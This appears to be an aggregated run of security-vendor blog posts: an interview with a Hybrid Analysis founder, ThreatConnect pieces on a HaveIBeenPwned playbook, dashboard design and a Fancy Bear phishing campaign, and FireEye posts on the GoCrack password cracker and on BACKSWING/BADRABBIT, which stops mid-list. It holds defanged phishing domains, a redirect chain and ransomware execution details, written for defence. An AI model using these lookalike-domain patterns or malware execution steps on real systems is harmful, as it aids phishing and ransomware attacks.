What role did the free version of your product, available on the Hybrid Analysis website, play in the company's evolution?

A lot of people in the community have been using the free version of Hybrid Analysis to analyze their own malware samples, share them with friends, or look up existing analysis reports and extract intelligence. Today, the site has approximately 44,000 active users and around 1 million sessions per month. One of the reasons the site took off is the simplicity and quality of the reports, which focus on what matters and enable effective incident response.

The success of Hybrid Analysis was, to a large extent, due to the engagement from the community. The samples we have been receiving allowed us to constantly field-test the system against the latest malware, stay on top of the game and also to embrace feedback from security professionals. This allowed us to keep improving at rapid pace in a competitive space, successfully.

What will happen to the free version of Hybrid Analysis? I saw on Twitter that your team pinky-promised to continue making it available for free to the community, but I was hoping you could comment further on this.

I’m personally committed to ensuring that the community platform will stay not only free, but grow even more useful and offer new capabilities shortly. Hybrid Analysis deserves to be the place for professionals to get a reasoned opinion about any binary they’ve encountered. We plan to open up the API, add more integrations and other free capabilities in the near future.

What stands out in your mind as you reflect upon your Hybrid Analysis journey so far? What’s motivating you to move forward?

Starting out without any noteworthy funding, co-founders, or advisors, in a saturated high-tech market that is extremely fast paced and full of money, it seemed impossible to succeed on paper. But the reality is: if you are offering a product or service that solves a real-world problem considerably better than the market leaders do, you always have a chance. My hope is that people who are considering becoming entrepreneurs will be encouraged to pursue their ideas. Be prepared to work 80 hours a week, but with the right technology, feedback from the community, amazing team members, and insightful advisors, you can make it happen.

In fact, it’s because of the value Hybrid Analysis has been adding to the community that I was able to attract the highly talented individuals that are currently on the team. It has always been important for me to make a difference, to contribute something and have a true impact on people’s lives. It all boils down to bringing more light than darkness into the world, as cheesy as that might sound.

Playbook Fridays: Have You Been Pwned?

Playbook Fridays: Check haveibeenpwned for indicators

Enriching Indicators with haveibeenpwned



Why Was the Playbook Created?

Data breaches come and go, and it is easy to forget who was breached and when. The team at Have I Been Pwned? has built a searchable database of 4.8 billion compromised accounts and provides a simple-to-use REST API for queries.

We have built a PlayBook to leverage this data and enrich the indicators that are important to your SecOps team.

How it Works:

  1. When looking at any EmailAddress indicator in the ThreatConnect platform simply click "Check HIBP".  That's all that is needed.
  2. From here, the ThreatConnect PlayBooks engine takes over and performs the following steps:
    a. Check HIBP for the email address
    b. If found, perform some data transformations to extract the data needed
    c. Tag the current Indicator with the name of the breach it was found in
    d. Search for existing Incidents to associate the EmailAddress to, creating a new Incident if required


One step for the analyst




Here you can see that this unlucky user's account was found in over 50 data breaches and we tagged the indicator with each breach.




We also created and associated an incident for each data breach that contains the breach date as well as a brief description of the breach.



It's important to note that we did not write a single line of code to build this playbook with HIBP, and relied entirely on utility apps provided in ThreatConnect Playbooks to "build the integration".  This showcases the power and extensibility of ThreatConnect as a true platform.  If an integration doesn't exist, you can easily create one using the built-in capabilities of ThreatConnect Playbooks.


How to Use It:

  1. Import the PlayBook; we have created a GitHub repository with the PlayBook file
  2. Click "Check HIBP"

The post Playbook Fridays: Have You Been Pwned? appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

Best Practices for Dashboards in Cybersecurity and Threat Intelligence

Explained Using New ThreatConnect Dashboards 

There's no shortage of "dashboards" available in the software world. Walking the floor at any major industry event, it's hard to miss the hordes of vendors touting their wares by showcasing line graphs, fancy animations, and (shudder) pie charts on big screen displays designed to shock and awe attendees into stopping by for scans in exchange for tchotchkes. But when it comes time to purchase from one of those vendors and you log in to their tool or platform, how often is the dashboard really your leaping-off point for your day-to-day? How much use do you get out of them on a daily basis? What's the point of a "bright and shiny" dashboard if all the bright and shiny does is make your eyes glaze over?



Dashboards should not be an impenetrable fog of complication.


Perhaps the reason dashboards aren't as captivating or useful as they could be is that too many of them just don't help users answer tough, key questions.

In our latest release, ThreatConnect introduces a brand new dashboard feature. In this blog post, I'll walk you through some of the built-in dashboard charts and use them to illustrate some best practices that you can employ when creating your own dashboards. That way, you can be sure your new ThreatConnect dashboards will help you answer tough, key questions about threat intelligence and your organization's security.

What Makes a Good Dashboard?

A good dashboard should provide at-a-glance monitoring of the information you need to make key decisions. Think about your car dashboard for a moment: it shows speed so you know to slow down or go faster, fuel levels so you know when to make a pit stop, and warning lights to show if there's a problem. These are key indicators that help drive decisions. Your car dashboard does not display a pie chart of how many times you've made left- and right-hand turns, counters for how blinky your turn signals are, or a rotating pew-pew map of where other cars are honking their horns at each other. These things don't make you a better driver.

Your ThreatConnect Dashboard should be like a car dashboard: it should help you make at-a-glance decisions. To that end, your dashboard should be, or show:

  • Comparative - Dashboards should help put things in context so you can compare data against one another.
  • Understandable - Your dashboards should be easy to follow and the information on them should be meaningful.
  • Ratio or Rate - Ideally, you should have some idea of change over time. There's a reason the biggest number on your dashboard is "Miles per Hour" and not "Miles Driven" or "Hours Driven."
  • Behavior Changing - Probably the most important one. Dashboards should provide information that helps drive the behavior of your security team.

I like to remember this using the acronym "C.U.R.B." Now let's go in-depth on each of these items, using examples from ThreatConnect.


Comparative

A guy walks into his therapist's office. The therapist says, "So, how's the family?" The guy says, "Compared to what?"

Good joke, right? It brings to mind the first part of CURB: Comparative. We deal with a lot of numbers and bits of information in cybersecurity, so it's important to understand how those metrics compare to one another. For example, if I told you that your team tracked ten incidents last month, what would you do with that information? Is that a lot? A little? But what if I told you that your team had ten incidents last month and zero in the two months prior? Now you have some context for that number, and you can consider taking action.

Let's take a look at a noncomparative and comparative example in ThreatConnect.


A chart of popular tags from this week.


In the above dashboard card¹, we've created a Query-based chart. These charts use TQL (ThreatConnect Query Language) to query and aggregate information. This particular card shows the most popular tags used on indicators that were added to ThreatConnect in the past week. You can duplicate this card yourself using the following query: dateAdded >= "NOW() - 7 DAYS".

Don't get me wrong: it's not a bad card, especially because I can click on any of these tags and see the associated indicators and intelligence. But consider how much more useful it would be if we compared "this week" to "last week":


Comparing this week against last week helps us identify trends and patterns.


Now we can see that these tags change week to week. Malware trackers have fallen off and instead we see a bucket of possibly benign indicators. Where'd they come from? Are we in danger of spending time on some false positives? Was that Felix malware ever resolved?

By comparing these two cards against each other, we start telling a story and can begin deciding how to take action. The "Last Week" card was created using the query: dateAdded >= "NOW() - 14 DAYS" and dateAdded < "NOW() - 7 DAYS". Note that both cards are shown side-by-side on the pre-built "Operations Dashboard" available in our Cloud environment.
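The week-over-week comparison that these two cards perform can be sketched in a few lines of Python. This is purely illustrative: the indicator records below are hypothetical stand-ins for what the two TQL queries above would return.

```python
from collections import Counter
from datetime import datetime, timedelta

# Hypothetical indicator records: (tag, dateAdded) pairs, standing in
# for the results of the two TQL queries shown above.
indicators = [
    ("Ransomware", datetime(2018, 4, 16)),
    ("Ransomware", datetime(2018, 4, 15)),
    ("Phishing", datetime(2018, 4, 10)),
    ("Phishing", datetime(2018, 4, 6)),
]

now = datetime(2018, 4, 18)
week_ago = now - timedelta(days=7)        # NOW() - 7 DAYS
two_weeks_ago = now - timedelta(days=14)  # NOW() - 14 DAYS

# "This Week" card: dateAdded >= NOW() - 7 DAYS
this_week = Counter(tag for tag, added in indicators if added >= week_ago)
# "Last Week" card: NOW() - 14 DAYS <= dateAdded < NOW() - 7 DAYS
last_week = Counter(
    tag for tag, added in indicators if two_weeks_ago <= added < week_ago
)

# Side-by-side comparison, mirroring the two dashboard cards.
for tag in sorted(set(this_week) | set(last_week)):
    print(f"{tag}: this week={this_week[tag]}, last week={last_week[tag]}")
```

Seeing a tag spike in one window and vanish in the other is exactly the kind of story the paired cards are meant to surface.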


Understandable

Take a look at the space shuttle cockpit photo from the beginning of this article. If your car's dashboard looked like that, how quickly do you think you'd be able to react? The same is true in cybersecurity: we can't react to our data and intelligence if we can't understand it! The same goes for the specific metrics we use; there's a reason your car shows "Miles per Hour" and not "Leagues per Microfortnight."


¹A "card" is the basic building block of a dashboard. Cards can be charts (bar, line, treemap, etc.), datatables, or functional widgets like a search bar.



Let's say you wanted to monitor the most popular tags in one or more sources and communities either for all time or for a specific date range. This is a good way of identifying interesting topics, especially when looking into a new source of intelligence.


How can you see what's going on in this hard-to-understand chart?
I dream of a world where terrible charts are anomalies.


The pie chart above is certainly one way to do it. But why display it that way? Most tags are too small to appear on the chart at all, and it's very hard to judge the relative size of the ones that do.


Fewer tags and a different layout makes for a much more understandable chart.


All we need for our decision, "does this source contain intel that's interesting to me?", is a simple grid that clearly shows the available tags and how many there are of each. An added bonus is that you can click on any of these tags much more easily than you could on the pie chart to actually view the associated indicators and intelligence. Note that this card (not the inveigling pie chart) is available on the built-in "My Dashboard" in our Cloud environment.

Ratio or Rate

This is probably the least critical of the four parts of CURB, but only because it doesn't apply to every dashboard card and metric like the others do. But, it does have its place! Using a ratio or rate makes it much easier to understand what's happening at a particular moment in time. The biggest number on your car dashboard is a rate (miles per hour) because as a driver you need to know how fast you're going now - just showing miles driven or hours driven won't tell you that and won't help you make a decision around whether to speed up or slow down.


What the heck happened with those two spikes in the right-hand chart? Better investigate!


In the example on the left, we show a cumulative count of Observations and False Positives over the past month. And basically we can see that... it goes up, which is what we'd expect since all we're doing is summing numbers! It tells a nice story, but not one from which we can really make decisions. Compare that to the example on the right where we take the exact same data but look at it per day. A pattern emerges; one that is worthy of additional investigation.
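The per-day view on the right can be derived from the cumulative view on the left with a simple difference between consecutive values. A minimal sketch, using a hypothetical series of cumulative observation counts:

```python
# Hypothetical cumulative count of observations, one value per day.
cumulative = [3, 6, 9, 40, 43, 46, 80]

# Per-day rate: the difference between consecutive cumulative values.
# The first day's rate is just its cumulative total.
per_day = [cumulative[0]] + [
    today - yesterday for yesterday, today in zip(cumulative, cumulative[1:])
]

print(per_day)  # the two spikes now stand out instead of blending into the climb
```

The cumulative series "just goes up," but the differenced series makes the two anomalous days obvious, which is the pattern worth investigating.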

The card on the right is available on our built-in "Source Analysis" dashboard in our Cloud environment.


Behavior Changing

Of all the parts of CURB, this one is probably the most important. The point of a dashboard is to help us make decisions, so the information we present in the dashboard must be behavior-changing. A big reason fancy dashboards fall short is that they offer "pretty pictures" but not behavior-changing information. Going back to the car example: if your dashboard says you're going 55 miles per hour on the highway, and I ask what you would do if it said 25 miles per hour instead, you know exactly how your behavior would change based on that information: you'd speed up!

Compare that to a metric that didn't change behavior. If you had a dashboard that said you had a million indicators, and I asked what you would do if the same dashboard told you that you had a million and a half indicators, what would you do? How would your behavior change? It probably wouldn't change at all: it's not a behavior-changing metric!

So I propose a litmus test when using a dashboard: if the information you're seeing changed, what would you do differently? If the answer is "I don't know" or "probably nothing," you should consider whether you're getting value out of that dashboard.

Let's say you manage a security team. Your goal is to make your team more proactive by identifying and blocking adversary assets directly rather than responding exclusively to active campaigns. To facilitate this, you've configured a Playbook that allows your team to block indicators that have been associated with specific pieces of intelligence like Incidents, Campaigns, and Adversaries. For your dashboard, you want to track how many indicators are being deployed based on the type of intelligence to see if your team is addressing the problem.

First, configure custom metrics to track the average monthly deployments to your defensive devices by the type of Group (Incident, Adversary, etc.), versus the indicator deployments your team has done in the current month.



ThreatConnect lets you create custom metrics to add to your dashboard. Note the "Interval" dropdown to help ensure you're using a ratio or rate.


Next, add the metrics to the Playbook that your team uses to deploy indicators to your defensive devices.


These metrics can be used outside of charting to drive logic and make your Playbooks smarter.


Now, every time your team uses this Playbook to deploy indicators, your dashboard will be populated with these metrics.


Average monthly host deployments by intelligence type.



Host deployments in the current month by intelligence type.
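The math behind these two cards is a simple grouping computation. Here's a rough Python sketch of it, using a hypothetical deployment log in place of the custom metrics (the record format is an assumption for illustration, not ThreatConnect's actual data model):

```python
from collections import Counter
from datetime import date

# Hypothetical deployment log: (month, group_type) per indicator
# deployment, standing in for the custom metrics the Playbook records.
deployments = [
    (date(2018, 1, 1), "Incident"),
    (date(2018, 1, 1), "Incident"),
    (date(2018, 2, 1), "Incident"),
    (date(2018, 2, 1), "Adversary"),
    (date(2018, 3, 1), "Adversary"),
    (date(2018, 3, 1), "Adversary"),
]

current_month = date(2018, 3, 1)
history = [(m, g) for m, g in deployments if m < current_month]
months = len({m for m, _ in history})

# Average monthly deployments by group type (the first card)...
avg_by_type = {g: n / months for g, n in Counter(g for _, g in history).items()}
# ...versus deployments in the current month (the second card).
current_by_type = Counter(g for m, g in deployments if m == current_month)

print(avg_by_type, dict(current_by_type))
```

If the current month skews toward Adversary-driven blocks while the historical average skews toward Incidents, the proactive initiative is working; if not, you know to course-correct.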


By putting those two charts on your dashboard, you can see that the initiative to have your team take more proactive action appears to be working (they're blocking Adversary assets instead of just reacting). And now we come full circle to the behavior-changing aspect. If the bottom card showed that your team was still taking most of their blocking actions on Incidents and Campaigns, you'd know to course-correct the initiative. This dashboard works because you've selected metrics that will drive decisions around a specific goal. Congratulations!

Learn More

Now that you understand how to create dashboards that are Comparative, Understandable, Ratio- or Rate-based, and Behavior Changing, I hope you'll take ThreatConnect's new dashboard feature for a spin and make some CURB-y dashboards of your own! This post barely scratches the surface of ThreatConnect Dashboards. Learn more about dashboards here. For a full copy of the release notes, so you can see everything included in our latest release and our new TAXII server, please contact us. For product feedback, please contact me directly.

Interested in ThreatConnect Dashboards? Sign Up For A Free Account Below to Get Started

The post Best Practices for Dashboards in Cybersecurity and Threat Intelligence appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

Fancy Bear Pens the Worst Blog Posts Ever

ThreatConnect reviews continuing Fancy Bear activity targeting citizen journalism organization Bellingcat and identifies a new tactic leveraging Blogspot to mask their credential harvesting links.

Our friends over at Bellingcat, which conducts open source investigations and writes extensively on Russia-related issues, recently shared a new tranche of spear-phishing emails they had received. Spoiler alert: they originated from Fancy Bear actors. Using the ThreatConnect platform we ingested the spear-phishing emails Bellingcat provided, processed out the relevant indicators, and compared them to previously known Fancy Bear activity. It turns out that this campaign had an association to 2016 Fancy Bear activity previously identified by the German Federal Office for the Protection of the Constitution (BfV). More interestingly, however, Fancy Bear employed a new tactic we hadn't previously seen: using Blogspot-hosted URLs in their spear-phishing email messages. The Blogspot page contained a JavaScript window.location redirect that sent the visitor to a second URL hosted on a dedicated server.

Delivery Stage

The phishing email used to deliver the malicious URLs pretends to be a password-change notification for the target's Google account or a link to view a folder shared via Dropbox. The collection of indicators related to this campaign has been shared with ThreatConnect's Common Community here.


Example of the Google account themed variant



Example of the Dropbox themed variant


The phishing email contains a link hosted on Blogspot such as this: hxxps://pkfnmugfdsveskjtb[.]blogspot[.]com. This URL also contains a query parameter, "uid", that is unique per phishing email. The full format for the URL is the following:




Importing the malicious email into ThreatConnect


The Blogspot page contains a small snippet of JavaScript near the top of the source HTML that performs a window.location redirect. An example of this JavaScript is:


The landing page URL in this redirect, hxxps://google[.]com[.]account-password[.]ga/security/signinoptions/password, is hosted on google[.]com[.]account-password[.]ga, which currently resolves to the IP address 80.255.12[.]231. This IP is a dedicated VPS hosted by MonoVM, a company based in Dubai. Honestly, this is quite low-quality content for a blog. Here is some good advice for authoring blog content, and, if so inclined, here is a good example to study.
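Since each phishing URL carries a per-recipient "uid" query parameter, a defender triaging these messages could extract that value to correlate which targets received which email. A minimal Python sketch, using a refanged version of the Blogspot hostname and a hypothetical uid value:

```python
from urllib.parse import urlparse, parse_qs

# Refanged example of a campaign URL; the "uid" value is hypothetical.
url = "https://pkfnmugfdsveskjtb.blogspot.com/?uid=abc123"

# Parse the query string and pull out the per-recipient identifier.
query = parse_qs(urlparse(url).query)
uid = query["uid"][0]
print(uid)
```

Collecting these identifiers across a tranche of emails makes it easy to see whether each target received a unique link, which is itself a useful tactic fingerprint.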

Passive DNS Analysis

Using Farsight's passive DNSDB integration in ThreatConnect, a number of other similar hostnames were found resolving to 80.255.12[.]231. One in particular, accounts[.]google[.]com[.]securitymail[.]gq, stands out from the rest. The base domain of this host, securitymail[.]gq, has a previous resolution to IP 95.153.32[.]52. This IP address is a broadband connection located in Estonia on TELE2's network that was also used to host the domain smtprelayhost[.]com from December 2015 to December 2016. This overlaps with the time that securitymail[.]gq resolved to the same broadband IP address in March 2016. In case you missed it, smtprelayhost[.]com is called out as being Fancy Bear infrastructure in BfV Cyber-Brief Nr. 01/2016.
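The pivot described above, finding hostnames that resolved to the same IP during overlapping time windows, can be sketched in Python. The dates below come from the text; the record format itself is an assumption for illustration:

```python
from datetime import date

# Hypothetical passive DNS records: (hostname, ip, first_seen, last_seen).
# Domains are refanged here for readability.
records = [
    ("smtprelayhost.com", "95.153.32.52", date(2015, 12, 1), date(2016, 12, 1)),
    ("securitymail.gq", "95.153.32.52", date(2016, 3, 1), date(2016, 3, 31)),
    ("unrelated.example", "203.0.113.9", date(2016, 1, 1), date(2016, 2, 1)),
]

def overlapping_pairs(records):
    """Yield hostname pairs that shared an IP in overlapping windows."""
    pairs = []
    for i, (h1, ip1, s1, e1) in enumerate(records):
        for h2, ip2, s2, e2 in records[i + 1:]:
            # Two date ranges overlap iff each starts before the other ends.
            if ip1 == ip2 and s1 <= e2 and s2 <= e1:
                pairs.append((h1, h2))
    return pairs

print(overlapping_pairs(records))
```

This kind of temporal co-resolution check is what links the new securitymail[.]gq infrastructure back to the smtprelayhost[.]com domain from the BfV report.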


Screenshot showing passive DNS overlap




Overview of the phishing campaign - highlighting infrastructure overlap

Bedecked in Blogspot

The use of Blogspot URLs has similarities with the notional tactics identified in a September Salon article on Fancy Bear leveraging Google's Accelerated Mobile Pages (AMP) to create URLs for their credential harvesting pages. Doing so likely allowed some Fancy Bear spear-phishing messages to avoid security filters that would have otherwise identified the malicious URLs. In this same way, a URL hosted on Google's own systems, in this case Blogspot, may be more likely to get past spam filters than URLs hosted on a third party IP address or hostname.


Exploiting Their Behavior

Several of the domains that host the credential harvesting pages identified above use .ga or .gq top level domains (TLDs) and were registered through Freenom. This reminded us of Fancy Bear's .ga Freenom infrastructure that they also employed against Bellingcat in October 2016. Looking closer at the domains identified in their recent attacks using our DomainTools Spaces App, we see that most of the domains were registered in the last three months.





ThreatConnect's DomainTools Spaces App results for account-password[.]ga and passwordreset[.]gq


What's more, the use of strings like "security," "login," "password," and "files" is another component of the registration tactics that they are employing, and one that we may be able to exploit. To that end, we decided to take a look at other domains that were registered using Freenom since July 2017 and contained one of those strings.


Using DomainTools Iris, we conducted a search for any domains that use a Freenom name server, use a .ga or .gq TLD, and contained one of the four strings previously mentioned.
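That filtering logic is straightforward to reproduce. A minimal Python sketch (the candidate domain list is hypothetical; real hunting would run against the DomainTools Iris results):

```python
import re

# The four strings and the two TLDs named above.
KEYWORDS = ("security", "login", "password", "files")
TLD_RE = re.compile(r"\.(ga|gq)$")

def matches_tactic(domain):
    """True if the domain uses a .ga/.gq TLD and contains a keyword."""
    return bool(TLD_RE.search(domain)) and any(k in domain for k in KEYWORDS)

# Hypothetical candidate domains (refanged for readability).
candidates = ["change-password.gq", "example.com", "fileshelp.ga", "login.net"]
print([d for d in candidates if matches_tactic(d)])
```

Feeding a bulk domain export through a filter like this quickly narrows a large registration feed down to the domains worth manual WHOIS review.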



DomainTools Iris query for Freenom domains.


Unfortunately, WHOIS records for Freenom-registered domains don't capture the create date showing when the domain was registered. Instead, we reviewed the WHOIS history for each of the domains returned by the Iris query to identify when it was registered, based on the earliest available record. The following domains were the result of that research:



access-apple-login-account[.]gq fileshelpprotut[.]ga reset-password-com[.]ga
account-activity-verification-login[.]ga fileshelpprotut[.]gq restore-login-account[.]gq
account-verify-comfirmation-info-login[.]ga filestore[.]gq review-quilogin[.]ga
account-verify-comfirmation-info-login[.]gq goldsecurity[.]ga secure-bankofamerica--login-com[.]ga
accountlogin-inc[.]ga info-apple-login-security[.]gq secure-bankofamerica--login-com[.]gq
accountverify-disableinfo-login[.]gq jp-login[.]gq secure-login-helpid-locked[.]gq
alert-new-login-com[.]ga locked-service-security[.]ga secure-management-login-account-index-webpass[.]gq
apple-realertlogin[.]gq login-bancochile-cl[.]ga secure-mobile-login1[.]gq
appleid-login-appleid[.]ga login-pap-web-access[.]ga secure1-client-login[.]ga
appleid-manageaccountloginupdated[.]ga login-recovery[.]gq secure1-client-login[.]gq
appleidcustomer-servicess-com-loginaccount[.]ga login-sec-apple-secure-account-updated[.]ga secure1-login-apps[.]gq
appleidcustomer-servicess-com-loginaccount[.]gq login-secure1-mobile[.]ga secure5647login-com[.]ga
browsersecurity[.]ga login-unlock-account[.]ga security-login-information[.]gq
change-password[.]gq login-update-unlock[.]gq securitycenter[.]ga
cleantarea-customerlogin-com[.]ga loginapps-info[.]ga service-account-home-login[.]gq
clientareasecurity1[.]gq loginpaypaas-securityuserid[.]ga service-autoreset-password-youraccount[.]ga
clientareasecurity4[.]gq loginservice-maintanceserversecurity[.]gq service-login-apple-verify-account-locked[.]gq
com-recoverylogin[.]gq manage-login[.]gq servicelogin-access-failed[.]gq
com-supportlogin-adminverification[.]ga manage-logins[.]gq services-loginaccount[.]ga
darksecurity[.]ga mod-files[.]ga sharefiles[.]gq
dns-sec-login-apple-invoice-confirmations[.]ga mydocuments[.]gq signin-login-php[.]ga
dns-webapps-login-account-secure-servers[.]ga newaction-loginactivituresource[.]ga srilankadocuments[.]ga
documentation[.]gq newfiles[.]ga statement-login-update-info[.]ga
documentshandler[.]ga ns-secures-login-accountjp-updates-community[.]gq summary-loginconfirmation[.]ga
emailloginerror[.]gq nursingdocumentation[.]gq unsecured-login-attempt[.]ga
facebook-login-page[.]gq ourfiles[.]ga verify-login-account-iinformation[.]ga
failure-login[.]ga pdf-document[.]ga verify-login-account-iinformation[.]gq
fileshelp[.]ga protector-files[.]ga welcome-apple-protectyourpassword[.]gq
fileshelp[.]gq recoverylogin-access[.]ga



While not definitively attributable to Fancy Bear, given some consistencies with their identified infrastructure, organizations that are concerned about Fancy Bear activity should thoroughly scrutinize any network activity identified with these domains. These domains have been shared in the ThreatConnect platform in Incident 20171031A: Additional .ga and .gq Freenom Infrastructure Similar to Fancy Bear's.

Bear with a Bone

At this point, this Russian advanced persistent threat (APT) has consistently targeted Bellingcat for at least two-and-a-half years, ever since the first identified activity in February 2015. Whatever your organization's biggest threat is, we'd argue that understanding their tactics and defending against and exploiting those tactics is the pinnacle of incorporating threat intelligence into your defenses. From our ThreatConnect Intelligence source to our extensive integrations, the ThreatConnect Platform enables organizations to not only identify their relevant threats, but proactively capitalize on their known tactics and automagically incorporate that intelligence into their defenses. In this case, we used the ThreatConnect platform to understand how an attack attempted to compromise an organization, connect information from that attack to a previous one, attribute the activity, and memorialize intelligence derived from the operation.

The post Fancy Bear Pens the Worst Blog Posts Ever appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

Introducing GoCrack: A Managed Password Cracking Tool

FireEye's Innovation and Custom Engineering (ICE) team released a tool today called GoCrack that allows red teams to efficiently manage password cracking tasks across multiple GPU servers by providing an easy-to-use, web-based real-time UI (Figure 1 shows the dashboard) to create, view, and manage tasks. Simply deploy a GoCrack server along with a worker on every GPU/CPU capable machine and the system will automatically distribute tasks across those GPU/CPU machines.

Figure 1: Dashboard

As readers of this blog probably know, password cracking tools are an effective way for security professionals to test password effectiveness, develop improved methods to securely store passwords, and audit current password requirements. Some use cases for a password cracking tool can include cracking passwords on exfil archives, auditing password requirements in internal tools, and offensive/defensive operations. We’re releasing GoCrack to provide another tool for distributed teams to have in their arsenal for managing password cracking and recovery tasks.

Keeping in mind the sensitivity of passwords, GoCrack includes an entitlement-based system that prevents users from accessing task data unless they are the original creator or have been granted access to the task. Modifications to a task, viewing of cracked passwords, downloading a task file, and other sensitive actions are logged and available for auditing by administrators. Engine files (files used by the cracking engine) such as dictionaries, mangling rules, etc. can be uploaded as "Shared," which allows other users to use them in tasks without granting the ability to download or edit them. This allows sensitive dictionaries to be used without exposing their contents.

Figure 2 shows a task list, Figure 3 shows the “Realtime Status” tab for a task, and Figure 4 shows the “Cracked Passwords” tab.

Figure 2: Task Listing

Figure 3: Task Status

Figure 4: Cracked Passwords Tab

GoCrack is shipping with support for hashcat v3.6+, requires no external database server (it uses a flat file), and includes support for both LDAP and database-backed authentication. In the future, we plan on adding support for MySQL and Postgres database engines for larger deployments, the ability to manage and edit files in the UI, automatic task expiration, and greater configuration of the hashcat engine. We're shipping with Dockerfiles to help jumpstart users with GoCrack. The server component can run on any Linux server with Docker installed. Users with NVIDIA GPUs can use NVIDIA Docker to run the worker in a container with full access to the GPUs.

GoCrack is available immediately for download along with its source code on the project's GitHub page. If you have any feature requests, questions, or bug reports, please file an issue in GitHub.

ICE is a small, highly trained team of engineers that incubate and deliver capabilities that matter to our products, our clients, and our customers. ICE is always looking for exceptional candidates interested in solving challenging problems quickly. If you're interested, check out FireEye careers.

BACKSWING – Pulling a BADRABBIT Out of a Hat

Executive Summary

On Oct. 24, 2017, coordinated strategic web compromises started to distribute BADRABBIT ransomware to unwitting users. FireEye appliances detected the download attempts and blocked our user base from infection. During our investigation into the activity, FireEye identified a direct overlap between BADRABBIT redirect sites and sites hosting a profiler we've been tracking as BACKSWING. We've identified 51 sites hosting BACKSWING and four confirmed to drop BADRABBIT. Throughout 2017, we observed two versions of BACKSWING and saw a significant increase in May with an apparent focus on compromising Ukrainian websites. The pattern of deployment raises the possibility of a strategic sponsor with specific regional interests and suggests a motivation other than financial gain. Given that many domains are still compromised with BACKSWING, we anticipate a risk that they will be used for future attacks.

Incident Background

Beginning on Oct. 24 at 08:00 UTC, FireEye detected and blocked attempts to infect multiple clients with a drive-by download masquerading as a Flash Update (install_flash_player.exe) that delivered a wormable variant of ransomware. Users were redirected to the infected site from multiple legitimate sites (e.g. http://www.mediaport[.]ua/sites/default/files/page-main.js) simultaneously, indicating a coordinated and widespread strategic web compromise campaign.

FireEye network devices blocked infection attempts at over a dozen victims primarily in Germany, Japan, and the U.S. until Oct. 24 at 15:00 UTC, when the infection attempts ceased and attacker infrastructure – both 1dnscontrol[.]com and the legitimate websites containing the rogue code – were taken offline.

BACKSWING Framework Likely Connected to BADRABBIT Activity

Strategic web compromises can have a significant amount of collateral targeting. It is common for threat actors to pair a strategic web compromise with profiling malware to target systems with specific application versions or victims. FireEye observed that BACKSWING, a malicious JavaScript profiling framework, was deployed to at least 54 legitimate sites starting as early as September 2016.  A handful of these sites were later used to redirect to BADRABBIT distribution URLs.

FireEye iSIGHT Intelligence tracks two distinct versions of BACKSWING that contain the same functionality, but differ in their code styles. We consider BACKSWING a generic container used to collect attributes of the current browsing session (User-Agent, HTTP Referrer, Cookies, and the current domain). This information is then relayed to a "C2," sometimes referred to as a "receiver." If the receiver is online, the server returns a unique JSON blob to the caller, which is then parsed by the BACKSWING code (Figure 1).

Figure 1: BACKSWING Reply

BACKSWING expects the JSON blob to have two fields, "InjectionType" (expected to be an integer) and "InjectionString" (expected to be a string containing HTML content). BACKSWING version 1 (Figure 2) explicitly handles the value of "InjectionType" via two code paths:

  • If InjectionType == 1 (Redirect browser to URL)
  • If InjectionType != 1 (render HTML into the DOM)

Figure 2: Backswing Version 1

In Version 2 (Figure 3), BACKSWING retains similar logic but generalizes the handling of InjectionString: the reply is always rendered into the DOM.

Figure 3: BACKSWING Version 2

Version 1:

  • FireEye observed the first version of BACKSWING in late 2016 on websites belonging to a Czech Republic hospitality organization in addition to a government website in Montenegro. Turkish-tourism websites were also injected with this profiler.
  • BACKSWING v1 was commonly injected in cleartext to affected websites, but over time, actors began to obfuscate the code using the open-source Dean-Edwards Packer and injected it into legitimate JavaScript resources on affected websites. Figure 4 shows the injection content.
  • Beginning in May 2017, FireEye observed a number of Ukrainian websites compromised with BACKSWING v1, and in June 2017, began to see content returned from BACKSWING receivers.
  • In late June 2017, BACKSWING servers returned an HTML div element with two distinct identifiers. When decoded, BACKSWING v1 embedded two div elements within the DOM with values of 07a06a96-3345-43f2-afe1-2a70d951f50a and 9b142ec2-1fdb-4790-b48c-ffdf22911104. No additional content was observed in these replies.

Figure 4: BACKSWING Injection Content

Version 2:

  • The earliest that FireEye observed BACKSWING v2 occurred on Oct. 5, 2017 across multiple websites that previously hosted BACKSWING v1
  • BACKSWING v2 was predominantly injected into legitimate JavaScript resources hosted on affected websites; however, some instances were injected into the sites’ main pages
  • FireEye observed limited instances in which websites hosting this version were also implicated in suspected BADRABBIT infection chains (detailed in Table 1).

Malicious profilers allow attackers to obtain more information about potential victims before deploying payloads (in this case, the BADRABBIT “flash update” dropper). While FireEye has not directly observed BACKSWING delivering BADRABBIT, BACKSWING was observed on multiple websites that were seen referring FireEye customers to 1dnscontrol[.]com, which hosted the BADRABBIT dropper. 

Table 1 highlights the legitimate sites hosting BACKSWING that were also used as HTTP referrers for BADRABBIT payload distribution.

Compromised Website | Observed BADRABBIT Redirect
Table 1: Sites hosting BACKSWING profilers and redirected users to a BADRABBIT download site

The compromised websites listed in Table 1 demonstrate one of the first times that we have observed the potential weaponization of BACKSWING. FireEye is tracking a growing number of legitimate websites that also host BACKSWING, underscoring the considerable footprint the actors could leverage in future attacks. Table 2 provides a list of additional sites compromised with BACKSWING.

Compromised Website
Table 2: Additional sites hosting BACKSWING profilers and associated receivers

The distribution of sites compromised with BACKSWING suggest a motivation other than financial gain. FireEye observed this framework on compromised Turkish sites and Montenegrin sites over the past year. We observed a spike of BACKSWING instances on Ukrainian sites, with a significant increase in May 2017. While some sites hosting BACKSWING do not have a clear strategic link, the pattern of deployment raises the possibility of a strategic sponsor with specific regional interests.

BADRABBIT Components

BADRABBIT is made up of several components, as described in Figure 5.

Figure 5: BADRABBIT components

Install_flashPlayer.exe (MD5: FBBDC39AF1139AEBBA4DA004475E8839)

The install_flashplayer.exe payload drops infpub.dat (MD5: C4F26ED277B51EF45FA180BE597D96E8) to the C:\Windows directory and executes it using rundll32.exe with the argument C:\Windows\infpub.dat,#1 15. This execution format mirrors that of EternalPetya.

infpub.dat (MD5: 1D724F95C61F1055F0D02C2154BBCCD3)

The infpub.dat binary is the primary ransomware component responsible for dropping and executing the additional components shown in the BADRABBIT Components section. An embedded RSA-2048 key facilitates the encryption process, which uses an AES-128 key to encrypt files. The extensions listed below are targeted for encryption:

The following directories are ignored during the encryption process:

  • \Windows
  • \Program Files
  • \ProgramData
  • \AppData

